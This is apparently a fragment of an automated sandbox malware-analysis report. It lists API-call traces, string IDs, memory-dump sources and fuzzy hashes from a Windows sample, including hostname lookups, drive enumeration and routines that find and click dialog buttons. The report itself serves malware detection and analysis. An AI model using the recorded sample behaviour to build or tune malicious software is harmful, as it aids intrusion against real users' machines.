                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 1976180769-4113822522
                                                                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                        • String ID:
                                                                        • API String ID: 461458858-0
                                                                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                        • DeleteObject.GDI32(?), ref: 004301D0
                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3969911579-0
                                                                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                        • String ID: 0
                                                                        • API String ID: 956284711-4108050209
                                                                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 1965227024-3771769585
                                                                        • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                        • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                        APIs
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$_memmove_wcslen
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 369157077-1007645807
                                                                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                        APIs
                                                                        • GetParent.USER32 ref: 00445BF8
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                        • __wcsicoll.LIBCMT ref: 00445C33
                                                                        • __wcsicoll.LIBCMT ref: 00445C4F
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 3125838495-3381328864
                                                                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CharNext
                                                                        • String ID:
                                                                        • API String ID: 1350042424-0
                                                                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                        APIs
                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                        • _wcscpy.LIBCMT ref: 004787E5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                        • API String ID: 3052893215-2127371420
                                                                        • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                        • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                        APIs
                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                        • __swprintf.LIBCMT ref: 0045E7F7
                                                                        • _wprintf.LIBCMT ref: 0045E8B3
                                                                        • _wprintf.LIBCMT ref: 0045E8D7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2295938435-2354261254
                                                                        • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                        • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                        • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                        • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 3038501623-2263619337
                                                                        • Opcode ID: c1d1e427df81d364f3e7315beb2c85998febd91a9edec5b390063b37ecf0eef7
                                                                        • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                        • Opcode Fuzzy Hash: c1d1e427df81d364f3e7315beb2c85998febd91a9edec5b390063b37ecf0eef7
                                                                        • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                        APIs
                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                        • __swprintf.LIBCMT ref: 0045E5F6
                                                                        • _wprintf.LIBCMT ref: 0045E6A3
                                                                        • _wprintf.LIBCMT ref: 0045E6C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 2295938435-8599901
                                                                        • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                        • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                        • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                        • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 00443B67
                                                                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                        • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                        • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                        • IsWindow.USER32(00000000), ref: 00443C3A
                                                                        • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1834419854-3405671355
                                                                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                        • LoadStringW.USER32(00000000), ref: 00454040
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • _wprintf.LIBCMT ref: 00454074
                                                                        • __swprintf.LIBCMT ref: 004540A3
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                        • API String ID: 455036304-4153970271
                                                                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
